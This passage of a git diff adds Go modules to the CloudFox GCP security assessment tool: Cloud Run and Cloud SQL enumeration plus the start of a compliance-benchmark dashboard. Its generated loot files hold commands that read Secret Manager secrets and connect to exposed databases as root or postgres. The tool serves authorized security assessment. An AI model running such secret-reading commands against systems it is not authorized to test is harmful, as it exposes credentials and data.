env.SecretVersion) + } + } + m.LootMap["cloudrun-env-vars"].Contents += "\n" + } + + // Add secret references to loot + if len(job.SecretRefs) > 0 { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + for _, ref := range job.SecretRefs { + if ref.Type == "env" { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, job.ProjectID, + ) + } else { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, job.ProjectID, + ) + } + } + 
m.LootMap["cloudrun-secret-refs"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Services table + servicesHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Region", + "URL", + "Ingress", + "Public", + "Invokers", + "Service Account", + "Default SA", + "Image", + "VPC Access", + "Min/Max", + "Env Vars", + "Secrets", + "Hardcoded", + } + + var servicesBody [][]string + for _, svc := range m.Services { + // Format public status + publicStatus := "No" + if svc.IsPublic { + publicStatus = "Yes" + } + + // Format default SA status + defaultSA := "No" + if svc.UsesDefaultSA { + defaultSA = "Yes" + } + + // Format invokers + invokers := "-" + if len(svc.InvokerMembers) > 0 { + invokers = strings.Join(svc.InvokerMembers, ", ") + } + + // Format VPC access + vpcAccess := "-" + if svc.VPCAccess != "" { + vpcAccess = extractName(svc.VPCAccess) + if svc.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(svc.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Format scaling + scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) + + // Format env var count + envVars := "-" + if svc.EnvVarCount > 0 { + envVars = fmt.Sprintf("%d", svc.EnvVarCount) + } + + // Format secrets count (Secret Manager references) + secretCount := svc.SecretEnvVarCount + svc.SecretVolumeCount + secrets := "-" + if secretCount > 0 { + secrets = fmt.Sprintf("%d", secretCount) + } + + // Format hardcoded secrets count + hardcoded := "No" + if len(svc.HardcodedSecrets) > 0 { + hardcoded = fmt.Sprintf("Yes (%d)", len(svc.HardcodedSecrets)) + } + + servicesBody = append(servicesBody, []string{ + svc.ProjectID, + m.GetProjectName(svc.ProjectID), + svc.Name, + svc.Region, + svc.URL, + formatIngress(svc.IngressSettings), + publicStatus, + invokers, + svc.ServiceAccount, + defaultSA, + 
svc.ContainerImage, + vpcAccess, + scaling, + envVars, + secrets, + hardcoded, + }) + } + + // Jobs table + jobsHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Region", + "Service Account", + "Default SA", + "Image", + "Tasks", + "Parallelism", + "Last Execution", + "Env Vars", + "Secrets", + "Hardcoded", + } + + var jobsBody [][]string + for _, job := range m.Jobs { + // Format default SA status + defaultSA := "No" + if job.UsesDefaultSA { + defaultSA = "Yes" + } + + // Format env var count + envVars := "-" + if job.EnvVarCount > 0 { + envVars = fmt.Sprintf("%d", job.EnvVarCount) + } + + // Format secrets count + secretCount := job.SecretEnvVarCount + job.SecretVolumeCount + secrets := "-" + if secretCount > 0 { + secrets = fmt.Sprintf("%d", secretCount) + } + + // Format hardcoded secrets count + hardcoded := "No" + if len(job.HardcodedSecrets) > 0 { + hardcoded = fmt.Sprintf("Yes (%d)", len(job.HardcodedSecrets)) + } + + // Format last execution + lastExec := "-" + if job.LastExecution != "" { + lastExec = extractName(job.LastExecution) + } + + jobsBody = append(jobsBody, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + job.Name, + job.Region, + job.ServiceAccount, + defaultSA, + job.ContainerImage, + fmt.Sprintf("%d", job.TaskCount), + fmt.Sprintf("%d", job.Parallelism), + lastExec, + envVars, + secrets, + hardcoded, + }) + } + + // Hardcoded secrets table + secretsHeader := []string{ + "Project ID", + "Project Name", + "Resource Type", + "Name", + "Region", + "Env Var", + "Secret Type", + } + + var secretsBody [][]string + // Add service secrets + for _, svc := range m.Services { + for _, secret := range svc.HardcodedSecrets { + secretsBody = append(secretsBody, []string{ + svc.ProjectID, + m.GetProjectName(svc.ProjectID), + "Service", + svc.Name, + svc.Region, + secret.EnvVarName, + secret.SecretType, + }) + // Add remediation to loot + m.addSecretRemediationToLoot(svc.Name, svc.ProjectID, svc.Region, secret.EnvVarName, 
"service") + } + } + // Add job secrets + for _, job := range m.Jobs { + for _, secret := range job.HardcodedSecrets { + secretsBody = append(secretsBody, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + "Job", + job.Name, + job.Region, + secret.EnvVarName, + secret.SecretType, + }) + // Add remediation to loot + m.addSecretRemediationToLoot(job.Name, job.ProjectID, job.Region, secret.EnvVarName, "job") + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(servicesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", + Header: servicesHeader, + Body: servicesBody, + }) + } + + if len(jobsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", + Header: jobsHeader, + Body: jobsBody, + }) + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + output := CloudRunOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatIngress formats ingress settings for display +func formatIngress(ingress string) string { + switch ingress { + case 
"INGRESS_TRAFFIC_ALL": + return "ALL (Public)" + case "INGRESS_TRAFFIC_INTERNAL_ONLY": + return "INTERNAL" + case "INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER": + return "INT+LB" + default: + return ingress + } +} + +// extractName extracts just the name from a resource path +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// addSecretRemediationToLoot adds remediation commands for hardcoded secrets +func (m *CloudRunModule) addSecretRemediationToLoot(resourceName, projectID, region, envVarName, resourceType string) { + secretName := strings.ToLower(strings.ReplaceAll(envVarName, "_", "-")) + + m.mu.Lock() + defer m.mu.Unlock() + + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# CRITICAL: Migrate hardcoded secret %s from %s %s\n"+ + "# 1. Create secret in Secret Manager:\n"+ + "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=- --project=%s\n"+ + "# 2. Grant access to Cloud Run service account:\n"+ + "gcloud secrets add-iam-policy-binding %s --member='serviceAccount:SERVICE_ACCOUNT' --role='roles/secretmanager.secretAccessor' --project=%s\n", + envVarName, resourceType, resourceName, + secretName, projectID, + secretName, projectID, + ) + + if resourceType == "service" { + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# 3. Update Cloud Run service to use secret:\n"+ + "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + resourceName, envVarName, secretName, region, projectID, + ) + } else { + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "# 3. 
Update Cloud Run job to use secret:\n"+ + "gcloud run jobs update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + resourceName, envVarName, secretName, region, projectID, + ) + } +} diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go new file mode 100644 index 00000000..68861c87 --- /dev/null +++ b/gcp/commands/cloudsql.go @@ -0,0 +1,395 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudSQLService "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudSQLCommand = &cobra.Command{ + Use: globals.GCP_CLOUDSQL_MODULE_NAME, + Aliases: []string{"sql", "database", "db"}, + Short: "Enumerate Cloud SQL instances with security analysis", + Long: `Enumerate Cloud SQL instances across projects with security-relevant details. + +Features: +- Lists all Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Shows network configuration (public/private IP, authorized networks) +- Identifies publicly accessible databases +- Shows SSL/TLS configuration and requirements +- Checks backup and high availability configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows IAM database authentication status +- Shows password policy configuration +- Shows maintenance window settings +- Shows point-in-time recovery status +- Identifies common security misconfigurations +- Generates gcloud commands for further analysis + +Security Columns: +- PublicIP: Whether the instance has a public IP address +- RequireSSL: Whether SSL/TLS is required for connections +- AuthNetworks: Number of authorized network ranges +- Backups: Automated backup status +- PITR: Point-in-time recovery status +- Encryption: CMEK or Google-managed +- IAM Auth: IAM database authentication +- PwdPolicy: Password validation policy +- HA: High availability 
configuration +- Issues: Detected security misconfigurations + +Attack Surface: +- Public IPs expose database to internet scanning +- Missing SSL allows credential sniffing +- 0.0.0.0/0 in authorized networks = world accessible +- Default service accounts may have excessive permissions +- Google-managed encryption may not meet compliance +- Missing password policy allows weak passwords`, + Run: runGCPCloudSQLCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudSQLModule struct { + gcpinternal.BaseGCPModule + + Instances []CloudSQLService.SQLInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudSQLOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudSQLOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudSQLOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDSQL_MODULE_NAME) + if err != nil { + return + } + + module := &CloudSQLModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []CloudSQLService.SQLInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudSQLModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDSQL_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Cloud SQL instances found", globals.GCP_CLOUDSQL_MODULE_NAME) + return + } + + // Count public instances 
+ publicCount := 0 + for _, instance := range m.Instances { + if instance.HasPublicIP { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(m.Instances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud SQL instances in project: %s", projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + cs := CloudSQLService.New() + instances, err := cs.Instances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDSQL_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud SQL in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) 
+ + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudSQLModule) initializeLootFiles() { + m.LootMap["cloudsql-commands"] = &internal.LootFile{ + Name: "cloudsql-commands", + Contents: "# Cloud SQL Details\n# Generated by CloudFox\n\n", + } +} + +func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceInfo) { + dbType := getDatabaseType(instance.DatabaseVersion) + connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) + + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s | Region: %s\n"+ + "# Public IP: %s\n", + instance.Name, instance.DatabaseVersion, + instance.ProjectID, instance.Region, + publicIP, + ) + + // gcloud commands + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "gcloud sql instances describe %s --project=%s\n"+ + "gcloud sql databases list --instance=%s --project=%s\n"+ + "gcloud sql users list --instance=%s --project=%s\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Connection commands based on database type + switch dbType { + case "mysql": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "mysql -h %s -u root -p\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:3306\n", + connectionInstance, + ) + case "postgres": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "psql -h %s -U 
postgres\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:5432\n", + connectionInstance, + ) + case "sqlserver": + if instance.PublicIP != "" { + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "sqlcmd -S %s -U sqlserver\n", + instance.PublicIP, + ) + } + m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:1433\n", + connectionInstance, + ) + } + + m.LootMap["cloudsql-commands"].Contents += "\n" +} + +// getDatabaseType returns the database type from version string +func getDatabaseType(version string) string { + switch { + case strings.HasPrefix(version, "MYSQL"): + return "mysql" + case strings.HasPrefix(version, "POSTGRES"): + return "postgres" + case strings.HasPrefix(version, "SQLSERVER"): + return "sqlserver" + default: + return "unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single merged table with one row per authorized network + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Database", + "Tier", + "Public IP", + "Private IP", + "SSL", + "Backups", + "PITR", + "Encrypt", + "IAM Auth", + "PwdPolicy", + "HA", + "Auth Network", + "CIDR", + "Public Access", + } + + var body [][]string + for _, instance := range m.Instances { + // Format encryption type + encryptionDisplay := instance.EncryptionType + if encryptionDisplay == "" || encryptionDisplay == "Google-managed" { + encryptionDisplay = "Google" + } + + // Format public/private IPs + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + privateIP := instance.PrivateIP + if privateIP == "" { + privateIP = "-" + } + + // If instance has authorized networks, create one row per network + if len(instance.AuthorizedNetworks) > 0 { + for _, network := range 
instance.AuthorizedNetworks { + publicAccess := "No" + if network.IsPublic { + publicAccess = "YES - WORLD ACCESSIBLE" + } + + networkName := network.Name + if networkName == "" { + networkName = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + boolToYesNo(instance.RequireSSL), + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + networkName, + network.Value, + publicAccess, + }) + } + } else { + // Instance has no authorized networks - single row + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + boolToYesNo(instance.RequireSSL), + boolToYesNo(instance.BackupEnabled), + boolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + boolToYesNo(instance.IAMAuthentication), + boolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := CloudSQLOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", 
+ m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go new file mode 100644 index 00000000..587c3052 --- /dev/null +++ b/gcp/commands/compliancedashboard.go @@ -0,0 +1,1823 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" + +var GCPComplianceDashboardCommand = &cobra.Command{ + Use: GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + Aliases: []string{"compliance", "cis", "benchmark"}, + Hidden: true, + Short: "Assess regulatory compliance against CIS GCP Benchmarks and security frameworks", + Long: `Assess regulatory compliance posture against industry standards and security frameworks. 
+ +Features: +- CIS GCP Foundation Benchmark assessment +- PCI-DSS control mapping +- SOC 2 control coverage analysis +- HIPAA compliance checks +- ISO 27001 control mapping +- Security Command Center compliance findings integration +- Organization policy compliance analysis +- Remediation guidance for failed controls + +Supported Frameworks: +- CIS GCP Foundation Benchmark v1.3/v2.0 +- PCI-DSS v3.2.1/v4.0 +- SOC 2 Type II +- HIPAA Security Rule +- ISO 27001:2013 +- NIST CSF + +Requires appropriate IAM permissions: +- roles/securitycenter.findingsViewer +- roles/orgpolicy.policyViewer +- roles/resourcemanager.organizationViewer`, + Run: runGCPComplianceDashboardCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ComplianceControl struct { + ControlID string + Framework string + ControlName string + Description string + Severity string // CRITICAL, HIGH, MEDIUM, LOW + Status string // PASS, FAIL, MANUAL, NOT_APPLICABLE + ResourceCount int + PassCount int + FailCount int + ProjectID string + Details string + Remediation string + References []string +} + +type ComplianceFramework struct { + Name string + Version string + TotalControls int + PassedControls int + FailedControls int + ManualControls int + NAControls int + Score float64 +} + +type ComplianceFailure struct { + ControlID string + Framework string + ControlName string + Severity string + ResourceName string + ResourceType string + ProjectID string + Details string + Remediation string + RiskScore int +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ComplianceDashboardModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Controls []ComplianceControl + Frameworks map[string]*ComplianceFramework + Failures []ComplianceFailure + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Cached data for compliance checks + orgPolicies map[string]bool + sccFindings 
map[string][]string // category -> resources + projectMetadata map[string]map[string]interface{} +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ComplianceDashboardOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComplianceDashboardOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComplianceDashboardOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPComplianceDashboardCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ComplianceDashboardModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Controls: []ComplianceControl{}, + Frameworks: make(map[string]*ComplianceFramework), + Failures: []ComplianceFailure{}, + LootMap: make(map[string]*internal.LootFile), + orgPolicies: make(map[string]bool), + sccFindings: make(map[string][]string), + projectMetadata: make(map[string]map[string]interface{}), + } + + // Initialize loot files + module.initializeLootFiles() + + // Initialize frameworks + module.initializeFrameworks() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Framework Initialization +// ------------------------------ +func (m *ComplianceDashboardModule) initializeFrameworks() { + m.Frameworks["CIS-GCP-1.3"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "1.3", + } + m.Frameworks["CIS-GCP-2.0"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "2.0", + } + m.Frameworks["PCI-DSS-4.0"] = &ComplianceFramework{ + Name: "PCI-DSS", + Version: "4.0", + } + m.Frameworks["SOC2"] = &ComplianceFramework{ + Name: "SOC 2 Type II", + 
Version: "2017", + } + m.Frameworks["HIPAA"] = &ComplianceFramework{ + Name: "HIPAA Security Rule", + Version: "2013", + } + m.Frameworks["ISO27001"] = &ComplianceFramework{ + Name: "ISO 27001", + Version: "2013", + } + m.Frameworks["NIST-CSF"] = &ComplianceFramework{ + Name: "NIST Cybersecurity Framework", + Version: "1.1", + } +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ComplianceDashboardModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Assessing compliance posture against security frameworks...", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + // Step 1: Gather SCC findings for compliance mapping + m.gatherSCCFindings(ctx, logger) + + // Step 2: Gather organization policies + m.gatherOrgPolicies(ctx, logger) + + // Step 3: Run CIS GCP Benchmark checks + m.runCISBenchmarkChecks(ctx, logger) + + // Step 4: Map to other frameworks + m.mapToFrameworks() + + // Check results + totalControls := len(m.Controls) + if totalControls == 0 { + logger.InfoM("No compliance controls could be assessed", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + logger.InfoM("This could mean: (1) Insufficient permissions, (2) No resources to assess", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + return + } + + // Count by status + passCount := 0 + failCount := 0 + manualCount := 0 + for _, c := range m.Controls { + switch c.Status { + case "PASS": + passCount++ + case "FAIL": + failCount++ + case "MANUAL": + manualCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Assessed %d compliance control(s): %d PASS, %d FAIL, %d MANUAL", + totalControls, passCount, failCount, manualCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + if failCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] %d compliance control(s) failed", failCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Data Gathering +// ------------------------------ +func (m 
*ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logger internal.Logger) { + client, err := securitycenter.NewClient(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Security Command Center client") + return + } + defer client.Close() + + for _, projectID := range m.ProjectIDs { + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, + } + + it := client.ListFindings(ctx, req) + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + if result.Finding != nil { + category := result.Finding.Category + m.mu.Lock() + m.sccFindings[category] = append(m.sccFindings[category], result.Finding.ResourceName) + m.mu.Unlock() + } + } + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Gathered %d SCC finding categories", len(m.sccFindings)), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } +} + +func (m *ComplianceDashboardModule) gatherOrgPolicies(ctx context.Context, logger internal.Logger) { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Resource Manager client") + return + } + + for _, projectID := range m.ProjectIDs { + project, err := crmService.Projects.Get(projectID).Do() + if err != nil { + continue + } + + m.mu.Lock() + m.projectMetadata[projectID] = map[string]interface{}{ + "name": project.Name, + "parent": project.Parent, + "labels": project.Labels, + } + m.mu.Unlock() + } +} + +// ------------------------------ +// CIS Benchmark Checks +// ------------------------------ +func (m *ComplianceDashboardModule) runCISBenchmarkChecks(ctx context.Context, logger internal.Logger) { + // CIS GCP Foundation Benchmark v1.3 / v2.0 Controls + + // Section 1: Identity and Access 
Management + m.checkCIS_1_1_ServiceAccountAdmin(ctx, logger) + m.checkCIS_1_2_ServiceAccountUser(ctx, logger) + m.checkCIS_1_3_ServiceAccountKeys(ctx, logger) + m.checkCIS_1_4_ServiceAccountTokenCreator(ctx, logger) + m.checkCIS_1_5_SeperationOfDuties(ctx, logger) + m.checkCIS_1_6_KMSRoles(ctx, logger) + m.checkCIS_1_7_SAKeyRotation(ctx, logger) + m.checkCIS_1_8_UserManagedKeys(ctx, logger) + m.checkCIS_1_9_CloudKMSSeparation(ctx, logger) + m.checkCIS_1_10_APIKeys(ctx, logger) + + // Section 2: Logging and Monitoring + m.checkCIS_2_1_CloudAuditLogging(ctx, logger) + m.checkCIS_2_2_LogSinks(ctx, logger) + m.checkCIS_2_3_RetentionPolicy(ctx, logger) + m.checkCIS_2_4_ProjectOwnership(ctx, logger) + m.checkCIS_2_5_AuditConfigChanges(ctx, logger) + m.checkCIS_2_6_SQLInstanceChanges(ctx, logger) + m.checkCIS_2_7_NetworkChanges(ctx, logger) + m.checkCIS_2_8_RouteChanges(ctx, logger) + m.checkCIS_2_9_FirewallChanges(ctx, logger) + m.checkCIS_2_10_VPCChanges(ctx, logger) + m.checkCIS_2_11_SQLServerAccessChanges(ctx, logger) + + // Section 3: Networking + m.checkCIS_3_1_DefaultNetwork(ctx, logger) + m.checkCIS_3_2_LegacyNetworks(ctx, logger) + m.checkCIS_3_3_DNSSEC(ctx, logger) + m.checkCIS_3_4_RSASHA1(ctx, logger) + m.checkCIS_3_5_RDPAccess(ctx, logger) + m.checkCIS_3_6_SSHAccess(ctx, logger) + m.checkCIS_3_7_FlowLogs(ctx, logger) + m.checkCIS_3_8_SSLPolicy(ctx, logger) + m.checkCIS_3_9_FirewallLogging(ctx, logger) + m.checkCIS_3_10_VPCNetworkPeering(ctx, logger) + + // Section 4: Virtual Machines + m.checkCIS_4_1_DefaultServiceAccount(ctx, logger) + m.checkCIS_4_2_BlockProjectWideSSH(ctx, logger) + m.checkCIS_4_3_OSLogin(ctx, logger) + m.checkCIS_4_4_SerialPortDisabled(ctx, logger) + m.checkCIS_4_5_IPForwarding(ctx, logger) + m.checkCIS_4_6_PublicIP(ctx, logger) + m.checkCIS_4_7_ShieldedVM(ctx, logger) + m.checkCIS_4_8_ComputeEncryption(ctx, logger) + m.checkCIS_4_9_ConfidentialComputing(ctx, logger) + + // Section 5: Storage + m.checkCIS_5_1_UniformBucketAccess(ctx, 
